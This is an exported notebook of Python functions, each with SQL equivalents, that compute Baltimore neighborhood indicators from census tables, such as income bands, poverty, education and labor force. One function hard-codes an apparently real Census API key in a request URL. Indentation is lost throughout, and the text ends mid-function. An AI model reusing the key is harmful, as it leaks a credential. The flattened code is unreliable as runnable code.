#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B19001 - HOUSEHOLD INCOME V
# HOUSEHOLD INCOME IN THE PAST 12 MONTHS (IN 2017 INFLATION-ADJUSTED DOLLARS)
# Table Creates: hh25 hh40 hh60 hh75 hhm75, mhhi
#purpose: Produce Household 45-60K Indicator
#input: Year
#output:
import pandas as pd
import glob
def hh60inc( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B19001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# val1.__class__.__name__
#
# create a new dataframe for giggles
fi = pd.DataFrame()
# append into that dataframe col 001
key = getColName(df, '001')
val = getColByName(df, '001')
fi[key] = val
# append into that dataframe col 009
key = getColName(df, '009')
val = getColByName(df, '009')
fi[key] = val
# append into that dataframe col 010
key = getColName(df, '010')
val = getColByName(df, '010')
fi[key] = val
# append into that dataframe col 011
key = getColName(df, '011')
val = getColByName(df, '011')
fi[key] = val
# Delete Rows where the 'denominator' column is 0 -> like the Jail
fi = fi[fi[fi.columns[0]] != 0]
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
#~~~~~~~~~~~~~~~
return fi.apply(lambda x: ( ( x[fi.columns[1] ]+ x[fi.columns[2] ]+ x[fi.columns[3] ] ) / x[fi.columns[0]])*100, axis=1)
"""
/* hh60inc */ --
WITH tbl AS (
select csa,
( (value[1] + value[2] + value[3]) / value[4] )*100 as result
from vital_signs.get_acs_vars_csa_and_bc('2013',ARRAY['B19001_009E','B19001_010E','B19001_011E','B19001_001E'])
)
UPDATE vital_signs.data
set hh60inc = result from tbl where data.csa = tbl.csa and data_year = '2013';
"""
# Cell
#File: hh75inc.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B19001 - HOUSEHOLD INCOME V
# HOUSEHOLD INCOME IN THE PAST 12 MONTHS (IN 2017 INFLATION-ADJUSTED DOLLARS)
# Table Creates: hh25 hh40 hh60 hh75 hhm75, mhhi
#purpose: Produce Household Income 60-70K Indicator
#input: Year
#output:
import pandas as pd
import glob
def hh75inc( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B19001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# val1.__class__.__name__
#
# create a new dataframe for giggles
fi = pd.DataFrame()
# append into that dataframe col 001
key = getColName(df, '001')
val = getColByName(df, '001')
fi[key] = val
# append into that dataframe col 012
key = getColName(df, '012')
val = getColByName(df, '012')
fi[key] = val
# Delete Rows where the 'denominator' column is 0 -> like the Jail
fi = fi[fi[fi.columns[0]] != 0]
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
#~~~~~~~~~~~~~~~
#12/1
return fi.apply(lambda x: ( x[fi.columns[1] ] / x[fi.columns[0]])*100, axis=1)
"""
/* hh75inc */ --
WITH tbl AS (
select csa,
( value[1] / value[2] )*100 as result
from vital_signs.get_acs_vars_csa_and_bc('2013',ARRAY['B19001_012E','B19001_001E'])
)
UPDATE vital_signs.data
set hh75inc = result from tbl where data.csa = tbl.csa and data_year = '2013';
"""
# Cell
#File: hhchpov.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B17001 - POVERTY STATUS IN THE PAST 12 MONTHS BY SEX BY AGE
# Universe: Population for whom poverty status is determined more information
#purpose: Produce Household Poverty Indicator
#input: Year
#output:
import pandas as pd
import glob
def hhchpov( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B17001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B17001_004E', 'B17001_005E', 'B17001_006E', 'B17001_007E', 'B17001_008E', 'B17001_009E', 'B17001_018E', 'B17001_019E', 'B17001_020E', 'B17001_021E', 'B17001_022E', 'B17001_023E', 'B17001_033E', 'B17001_034E', 'B17001_035E', 'B17001_036E', 'B17001_037E', 'B17001_038E', 'B17001_047E', 'B17001_048E', 'B17001_049E', 'B17001_050E', 'B17001_051E', 'B17001_052E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B17001_004E', 'B17001_005E', 'B17001_006E', 'B17001_007E', 'B17001_008E', 'B17001_009E', 'B17001_018E', 'B17001_019E', 'B17001_020E', 'B17001_021E', 'B17001_022E', 'B17001_023E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B17001_004E', 'B17001_005E', 'B17001_006E', 'B17001_007E', 'B17001_008E', 'B17001_009E', 'B17001_018E', 'B17001_019E', 'B17001_020E', 'B17001_021E', 'B17001_022E', 'B17001_023E', 'B17001_033E', 'B17001_034E', 'B17001_035E', 'B17001_036E', 'B17001_037E', 'B17001_038E', 'B17001_047E', 'B17001_048E', 'B17001_049E', 'B17001_050E', 'B17001_051E', 'B17001_052E']
for col in columns:
denominators = addKey(df, denominators, col)
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] #Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
#~~~~~~~~~~~~~~~
# Step 4)
# Add Special Baltimore City Data
#~~~~~~~~~~~~~~~
url = 'https://api.census.gov/data/20'+str(year)+'/acs/acs5/subject?get=NAME,S1701_C03_002E&for=county%3A510&in=state%3A24&key=829bf6f2e037372acbba32ba5731647c5127fdb0'
table = pd.read_json(url, orient='records')
fi['final']['Baltimore City'] = float(table.loc[1, table.columns[1]])
return fi['final']
"""
/* <hhchpov_14> */
WITH tbl AS (
select csa,
( (value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10] + value[11] + value[12])
/ nullif(
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10] + value[11] + value[12] + value[13] + value[14] + value[15] + value[16] + value[17] + value[18] + value[19] + value[20] + value[21] + value[22] + value[23] + value[24] ),
0)
) * 100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B17001_004E','B17001_005E','B17001_006E','B17001_007E','B17001_008E','B17001_009E','B17001_018E','B17001_019E','B17001_020E','B17001_021E','B17001_022E','B17001_023E','B17001_033E','B17001_034E','B17001_035E','B17001_036E','B17001_037E','B17001_038E','B17001_047E','B17001_048E','B17001_049E','B17001_050E','B17001_051E','B17001_052E'])
)
update vital_signs.data
set hhchpov = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: hhm75.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B19001 - HOUSEHOLD INCOME V
# HOUSEHOLD INCOME IN THE PAST 12 MONTHS (IN 2017 INFLATION-ADJUSTED DOLLARS)
# Table Creates: hh25 hh40 hh60 hh75 hhm75, mhhi
#purpose: Produce Household Income Over 75K Indicator
#input: Year
#output:
import pandas as pd
import glob
def hhm75( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B19001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# val1.__class__.__name__
#
# create a new dataframe for giggles
fi = pd.DataFrame()
# append into that dataframe col 001
key = getColName(df, '001')
val = getColByName(df, '001')
fi[key] = val
# append into that dataframe col 002
key = getColName(df, '002')
val = getColByName(df, '002')
fi[key] = val
# append into that dataframe col 003
key = getColName(df, '003')
val = getColByName(df, '003')
fi[key] = val
# append into that dataframe col 004
key = getColName(df, '004')
val = getColByName(df, '004')
fi[key] = val
# append into that dataframe col 005
key = getColName(df, '005')
val = getColByName(df, '005')
fi[key] = val
# append into that dataframe col 006
key = getColName(df, '006')
val = getColByName(df, '006')
fi[key] = val
# append into that dataframe col 007
key = getColName(df, '007')
val = getColByName(df, '007')
fi[key] = val
# append into that dataframe col 008
key = getColName(df, '008')
val = getColByName(df, '008')
fi[key] = val
# append into that dataframe col 009
key = getColName(df, '009')
val = getColByName(df, '009')
fi[key] = val
# append into that dataframe col 010
key = getColName(df, '010')
val = getColByName(df, '010')
fi[key] = val
# append into that dataframe col 011
key = getColName(df, '011')
val = getColByName(df, '011')
fi[key] = val
# append into that dataframe col 012
key = getColName(df, '012')
val = getColByName(df, '012')
fi[key] = val
# Delete Rows where the 'denominator' column is 0 -> like the Jail
fi = fi[fi[fi.columns[0]] != 0]
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
#~~~~~~~~~~~~~~~
return fi.apply(lambda x: ( ( x[fi.columns[0]]-( x[fi.columns[1] ]+ x[fi.columns[2] ]+ x[fi.columns[3] ]+ x[fi.columns[4] ]+ x[fi.columns[5] ]+ x[fi.columns[6] ]+ x[fi.columns[7] ]+ x[fi.columns[8] ]+ x[fi.columns[9] ]+ x[fi.columns[10] ]+ x[fi.columns[11] ] ) ) / x[fi.columns[0]])*100, axis=1)
# Cell
#File: hhpov.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B17017 - Household Poverty, Uses Table B17017 which includes V
# Poverty Status in the Past 12 Months by Household Type by Age of Householder (Universe = households)
#purpose: Produce Household Poverty Indicator
#input: Year
#output:
import pandas as pd
import glob
def hhpov( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B17017*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# create a new dataframe for giggles
fi = pd.DataFrame()
# append into that dataframe col 003
key = getColName(df, '003')
val = getColByName(df, '003')
fi[key] = val
# append into that dataframe col 032
key = getColName(df, '032')
val = getColByName(df, '032')
fi[key] = val
# construct the denominator, returns 0 iff the other two rows are equal.
fi['denominator'] = nullIfEqual( df, '003', '032')
# Delete Rows where the 'denominator' column is 0
fi = fi[fi['denominator'] != 0]
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
#~~~~~~~~~~~~~~~
return fi.apply(lambda x: (x[fi.columns[0]] / x['denominator'])*100, axis=1)
# Cell
#File: hhs.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B11005 - HOUSEHOLDS BY PRESENCE OF PEOPLE UNDER 18 YEARS BY HOUSEHOLD TYPE
# Universe: Households
# Table Creates: hhs, fam, femhhs
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def hhs( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B11005*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
df1['tot'] = df[ 'B11005_001E_Total' ]
return df1['tot']
# Cell
#File: hsdipl.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B06009 - PLACE OF BIRTH BY EDUCATIONAL ATTAINMENT IN THE UNITED STATES
#purpose: Produce Workforce and Economic Development - Percent Population (25 Years and over) With High School Diploma and Some College or Associates Degree
#Table Uses: B06009 - lesshs, hsdipl, bahigher
#input: Year
#output:
import pandas as pd
import glob
def hsdipl( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B06009*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B06009_003E','B06009_004E','B06009_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B06009_003E','B06009_004E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B06009_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation + final mods
# ( ( value[1] + value[2] ) / nullif(value[3],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <hsdipl_14> */ --
WITH tbl AS (
select csa,
( ( value[1] + value[2] ) / nullif(value[3],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B06009_003E','B06009_004E','B06009_001E'])
)
update vital_signs.data
set hsdipl = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: lesshs.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B06009 - PLACE OF BIRTH BY EDUCATIONAL ATTAINMENT IN THE UNITED STATES
#purpose: Produce Workforce and Economic Development - Percent Population (25 Years and over) With Less Than a High School Diploma or GED Indicator
#Table Uses: B06009 - lesshs, hsdipl, bahigher
#input: Year
#output:
import pandas as pd
import glob
def lesshs( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B06009*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B06009_002E','B06009_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B06009_002E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B06009_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation + final mods
# ( value[1] / nullif(value[2],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <lesshs_14> */ --
WITH tbl AS (
select csa,
( value[1] / nullif(value[2],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B06009_002E','B06009_001E'])
)
update vital_signs.data
set lesshs = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: male.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B01001 - SEX BY AGE
# Universe: Total population
# Table Creates: tpop, female, male, age5 age18 age24 age64 age65
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def male( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B01001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# df.columns
total = df['B01001_001E_Total']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
df1['onlyTheFellas'] = df[ 'B01001_002E_Total_Male' ]
return df1['onlyTheFellas']
# Cell
#File: nilf.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B23001 - SEX BY AGE BY EMPLOYMENT STATUS FOR THE POPULATION 16 YEARS AND OVER
# Universe - Population 16 years and over
# Table Creates: empl, unempl, unempr, nilf
#purpose: Produce Workforce and Economic Development - Percent Population 16-64 Not in Labor Force Indicator
#input: Year
#output:
import pandas as pd
import glob
def nilf( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B23001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B23001_003E', 'B23001_010E', 'B23001_017E', 'B23001_024E', 'B23001_031E', 'B23001_038E', 'B23001_045E', 'B23001_052E', 'B23001_059E', 'B23001_066E', 'B23001_089E', 'B23001_096E', 'B23001_103E', 'B23001_110E', 'B23001_117E', 'B23001_124E', 'B23001_131E', 'B23001_138E', 'B23001_145E', 'B23001_152E', 'B23001_009E', 'B23001_016E', 'B23001_023E', 'B23001_030E', 'B23001_037E', 'B23001_044E', 'B23001_051E', 'B23001_058E', 'B23001_065E', 'B23001_072E', 'B23001_095E', 'B23001_102E', 'B23001_109E', 'B23001_116E', 'B23001_123E', 'B23001_130E', 'B23001_137E', 'B23001_144E', 'B23001_151E', 'B23001_158E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B23001_009E', 'B23001_016E', 'B23001_023E', 'B23001_030E', 'B23001_037E', 'B23001_044E', 'B23001_051E', 'B23001_058E', 'B23001_065E', 'B23001_072E', 'B23001_095E', 'B23001_102E', 'B23001_109E', 'B23001_116E', 'B23001_123E', 'B23001_130E', 'B23001_137E', 'B23001_144E', 'B23001_151E', 'B23001_158E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B23001_003E', 'B23001_010E', 'B23001_017E', 'B23001_024E', 'B23001_031E', 'B23001_038E', 'B23001_045E', 'B23001_052E', 'B23001_059E', 'B23001_066E', 'B23001_089E', 'B23001_096E', 'B23001_103E', 'B23001_110E', 'B23001_117E', 'B23001_124E', 'B23001_131E', 'B23001_138E', 'B23001_145E', 'B23001_152E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( ( value[21]+value[22]+value[23]+value[24]+value[25]+value[26]+value[27]+value[28]+value[29]+value[30]+value[31]+value[32]+value[33]+value[34]+value[35]+value[36]+value[37]+value[38]+value[39]+value[40]) --not in labor force 16-64
# /
# nullif( (value[1]+value[2]+value[3]+value[4]+value[5]+value[6]+value[7]+value[8]+value[9]+value[10]+value[11]+value[12]+value[13]+value[14]+value[15]+value[16]+value[17]+value[18]+value[19]+value[20]) -- population 16 to 64 ,0) )*100::numeric
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <nilf_14> */ --
WITH tbl AS (
select csa,
( (value[21]+value[22]+value[23]+value[24]+value[25]+value[26]+value[27]+value[28]+value[29]+value[30]+value[31]+value[32]+value[33]+value[34]+value[35]+value[36]+value[37]+value[38]+value[39]+value[40]) --not in labor force 16-64 / nullif( (value[1]+value[2]+value[3]+value[4]+value[5]+value[6]+value[7]+value[8]+value[9]+value[10]+value[11]+value[12]+value[13]+value[14]+value[15]+value[16]+value[17]+value[18]+value[19]+value[20]) -- population 16 to 64 ,0) )*100::numeric
as result
from vital_signs.get_acs_vars_csa_and_bc('2014', ARRAY['B23001_003E','B23001_010E','B23001_017E','B23001_024E','B23001_031E','B23001_038E','B23001_045E','B23001_052E','B23001_059E','B23001_066E','B23001_089E','B23001_096E','B23001_103E','B23001_110E','B23001_117E','B23001_124E','B23001_131E','B23001_138E','B23001_145E','B23001_152E','B23001_009E','B23001_016E','B23001_023E','B23001_030E','B23001_037E','B23001_044E','B23001_051E','B23001_058E','B23001_065E','B23001_072E','B23001_095E','B23001_102E','B23001_109E','B23001_116E','B23001_123E','B23001_130E','B23001_137E','B23001_144E','B23001_151E','B23001_158E'])
)
update vital_signs.data
set nilf = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: othrcom.py
#Author: Charles Karpati
#Date: 1/24/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B08101 - MEANS OF TRANSPORTATION TO WORK BY AGE
# Universe: Workers 16 years and over
# Table Creates: othrcom, drvalone, carpool, pubtran, walked
#purpose: Produce Sustainability - Percent of Population Using Other Means to Commute to Work (Taxi, Motorcycle, Bicycle, Other) Indicator
#input: Year
#output:
import pandas as pd
import glob
def othrcom( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B08101*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B08101_001E','B08101_049E','B08101_041E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B08101_041E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B08101_001E','B08101_049E']
for col in columns:
denominators = addKey(df, denominators, col)
